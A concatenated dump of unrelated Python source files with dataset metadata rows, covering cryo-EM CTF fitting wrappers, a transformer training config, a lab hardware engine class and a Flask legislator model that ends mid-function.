new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
plt.ylabel('Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
plt.ylabel('Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
@classmethod
def ctffind(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='ctffind', param_file='ctf_params.txt', fast=False,
print_results=True, print_head=True,
plot_ctf=True, show_legend=True):
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# default params ctffind 4.0.17 (moved to top of this file anyway)
#default_params = {
# "pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
# 'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
# 'def_step':500, 'astig':100, 'phase':'no', 'min_phase':0,
# 'max_phase':2, 'phase_step':0.1}
#param_names = [
# 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
# 'min_def', 'max_def', 'def_step', 'astig', 'phase',
# 'min_phase', 'max_phase', 'phase_step']
# keep params if list, add default if dict
if isinstance(params, list):
comb_params = [pixel_a] + params
elif isinstance(params, dict):
params_dict = cls.default_params_ctffind.copy()
params_dict.update(params)
params_dict['pixel_a'] = pixel_a
param_names = cls.make_param_names_ctffind(params=params_dict)
comb_params = [params_dict[name] for name in param_names]
# set ctffind out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')
# wite ctf parameters to a file
param_path = os.path.join(ctf_dir, param_file)
pf = open(param_path, 'w')
pf.write(image_path + '\n')
pf.write(ctf_path + '\n')
str_params = [str(par) + '\n' for par in comb_params]
pf.writelines(str_params)
pf.flush()
# execute ctffind
# shell commands that work:
# - ctffind < param_path
# - cat params.txt | ctffind
#print(image)
if fast:
ctf_cmd = [executable, '--fast']
else:
ctf_cmd = [executable]
try:
subprocess.check_call(ctf_cmd, stdin=open(param_path))
except Exception as exc:
# workaround for ctffind command returning code 255 (4.1.8, 09.2018)
logging.debug('CalledProcessError: ' + str(exc))
# read results:
ctf_txt = np.loadtxt(ctf_txt_path)
results = {
"defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
"angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
"ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
'pixel_a':pixel_a}
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['ctf_path'] = ctf_path
# prepare header for defoci and phases
if print_head:
left_space = ' ' * old_div((len(image_name) - 5), 2)
right_space = ' ' *old_div ((len(image_name) - 4), 2)
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# plot ctf
if plot_ctf:
plt.figure()
avrot_data = np.loadtxt(ctf_avrot_path)
x_data = avrot_data[0] / pixel_a
plt.plot(x_data, avrot_data[2], 'g-', label='PS')
plt.plot(
x_data, avrot_data[3], color='orange', linewidth=2,
label='CTF fit')
plt.plot(
x_data, avrot_data[4], color='blue', linewidth=2,
label='Quality')
plt.ylim(-0.1, 1.1)
plt.xlabel("Spatial frequency [1/A])")
plt.ylabel("Amplitude")
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def make_param_names_ctffind(cls, params):
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
elif in_last_cycle and (line.find('Defocus_U') >= 0):
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
data_split = line.strip().split()[:-2]
in_last_cycle_data = False
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
if print_validation:
for val_line in validation_lines:
print(val_line)
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def read_pixel_size(cls, image_path):
image_io = ImageIO()
if image_path.endswith('.st'):
image_io.readHeader(file=image_path, fileFormat='mrc')
else:
image_io.readHeader(file=image_path)
if image_io.pixel is not None:
if isinstance(image_io.pixel, (list, tuple)):
pixel_a = 10 * image_io.pixel[0]
else:
pixel_a = 10 * image_io.pixel
else:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
if pixel_a == 0:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
stack_dir, stack_name = os.path.split(stack_path)
stack_base, stack_extension = stack_name.rsplit('.', 1)
if stack_extension == 'st':
stack_extension = 'mrc'
file_format = 'mrc'
else:
file_format = None
flat_path = os.path.join(
flat_dir, stack_base + '_flat.' + stack_extension)
frame = Image.read(file=stack_path, fileFormat=file_format)
frame.data = np.sum(frame.data, axis=2, dtype=frame.data.dtype)
frame.write(file=flat_path, pixel=frame.pixelsize)
return flat_path
| true | true |
f7101a83b95d3f574f2be24cf7bb5968d97a4765 | 3,783 | py | Python | examples/bengali/bengali_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | 5 | 2020-05-31T07:40:36.000Z | 2022-02-13T19:18:40.000Z | examples/greek/greek_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | null | null | null | examples/greek/greek_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | 2 | 2021-03-25T12:44:04.000Z | 2021-03-25T16:50:59.000Z | from multiprocessing import cpu_count
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"
MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE =False
SEED = 777
# training instances = 7000 > if batch size=8, batches = 875 > evaluate during training steps -> 80 or 175
args = {
'output_dir': 'temp/outputs/',
"best_model_dir": "temp/outputs/best_model",
'cache_dir': 'temp/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 128, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 3,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'n_fold': 3,
'logging_steps': 60,
'save_steps': 60,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 60,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
language_modeling_args = {
'output_dir': 'temp/lm/outputs/',
"best_model_dir": "temp/lm/outputs/best_model",
'cache_dir': 'temp/lm/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 152, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 2,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'logging_steps': 80,
'save_steps': 80,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 80,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
| 26.089655 | 106 | 0.665609 | from multiprocessing import cpu_count
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"
MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE =False
SEED = 777
args = {
'output_dir': 'temp/outputs/',
"best_model_dir": "temp/outputs/best_model",
'cache_dir': 'temp/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 128,
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 3,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'n_fold': 3,
'logging_steps': 60,
'save_steps': 60,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 60,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
language_modeling_args = {
'output_dir': 'temp/lm/outputs/',
"best_model_dir": "temp/lm/outputs/best_model",
'cache_dir': 'temp/lm/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 152,
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 2,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'logging_steps': 80,
'save_steps': 80,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 80,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
| true | true |
f7101a8b865c1f87f28c1270c97bd9246634db2e | 69 | py | Python | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 11 | 2020-04-05T07:24:46.000Z | 2021-01-10T06:58:00.000Z | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 1 | 2021-09-09T16:46:18.000Z | 2021-09-09T16:46:18.000Z | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 1 | 2020-10-26T17:50:10.000Z | 2020-10-26T17:50:10.000Z | from .module import * # noqa
from .models import Trail, Hop # noqa
| 17.25 | 37 | 0.695652 | from .module import *
from .models import Trail, Hop
| true | true |
f7101aab8fc3aaf31dfafe13235193eac5d70266 | 8,534 | py | Python | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 5 | 2016-05-26T13:46:00.000Z | 2020-03-03T13:07:47.000Z | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 2 | 2018-04-17T15:06:35.000Z | 2019-03-25T18:13:10.000Z | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 1 | 2016-05-28T19:36:38.000Z | 2016-05-28T19:36:38.000Z | import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
'''
Defines hardware-specific interface
The user-defind attributes are ones set by the end-user of this library in
their IO manifest. The IO manifest is system specific and describes the
hardware they are using for data acquisition.
User-defined attributes
-----------------------
name : string
Name of the engine. Must be unique across all engines. This name is
used for debugging and metadata purposes.
master_clock : bool
If true, this engine will provide a timestamp whenever it's requested
via `get_ts`. This is typically used for software-timed events (events
generated by the hardware will typically have a timestamp that's
determined by the engine that controls that particular device).
hw_ai_monitor_period : float (sec)
Poll period (in seconds). This defines how quickly acquired (analog
input) data is downloaded from the buffers (and made available to
listeners). If you want to see data as soon as possible, set the poll
period to a small value. If your application is stalling or freezing,
set this to a larger value. This poll period is a suggestion, not a
contract.
hw_ao_monitor_period : float (sec)
Poll period (in seconds). This defines how often callbacks for the
analog outputs are notified (i.e., to generate additional samples for
playout). If the poll period is too long, then the analog output may
run out of samples. This poll period is a suggestion, not a contract.
Attributes
----------
configured : bool
True if the hardware has been configured.
Notes
-----
When subclassing, you only need to implement the callbacks required by your
hardware. For example, if your hardware only has analog inputs, you only
need to implement the analog input methods.
'''
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
'''
Return channels matching criteria
Parameters
----------
mode : {None, 'analog', 'digital'
Type of channel
direction : {None, 'input, 'output'}
Direction
timing : {None, 'hardware', 'software'}
Hardware or software-timed channel. Hardware-timed channels have a
sampling frequency greater than 0.
active : bool
If True, return only channels that have configured inputs or
outputs.
'''
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
'''
Write hardware-timed analog output data to the buffer
Parameters
----------
data : 2D array
Data to write (format channel x time)
offset : int
Sample at which to start writing data. Sample is relative to
beginning of data acquisition. This can overwrite data that has
already been written to the buffer but not consumed by the
hardware.
timeout : float
Time, in seconds, to keep trying to write the data before failing.
Notes
-----
When subclassing, raise an exception if the system attempts to write
data beginning at an offset that has already been consumed by the
hardware and cannot be modified.
'''
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
'''
Return a copy of this engine with specified channels included
This is intended as a utility function to assist various routines that
may need to do a quick operation before starting the experiment. For
example, calibration may only need to run a subset of the channels.
'''
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
| 35.707113 | 80 | 0.639325 | import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
| true | true |
f7101b9b13578e8edd6324341c1a4a1243423eca | 1,967 | py | Python | model.py | adinahhh/educated-citizen | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 1 | 2020-03-06T19:41:59.000Z | 2020-03-06T19:41:59.000Z | model.py | adinahhh/ballot-project | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 5 | 2020-03-24T18:21:24.000Z | 2021-08-23T20:39:22.000Z | model.py | adinahhh/ballot-project | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 1 | 2020-03-27T17:21:25.000Z | 2020-03-27T17:21:25.000Z | """Models for final hackbright project """
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
""" Info on current legislators. """
__tablename__ = "current_legislators"
legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
last_name = db.Column(db.String(25), nullable=False)
full_name = db.Column(db.String(200), nullable=False)
state = db.Column(db.String(20), nullable=False)
party = db.Column(db.String(50), nullable=False)
opensecrets_id = db.Column(db.String(10), nullable=True)
govtrack_id = db.Column(db.Integer, nullable=False)
votesmart_id = db.Column(db.Integer, nullable=True)
phone = db.Column(db.String(25), nullable=True)
website = db.Column(db.String(150), nullable=True)
def __repr__(self):
""" provide info on legislator."""
return f"Legislator: {self.full_name} party: {self.party}"
##### getting direction from Testing lab below #####
def testing_data():
""" create sample data for running tests """
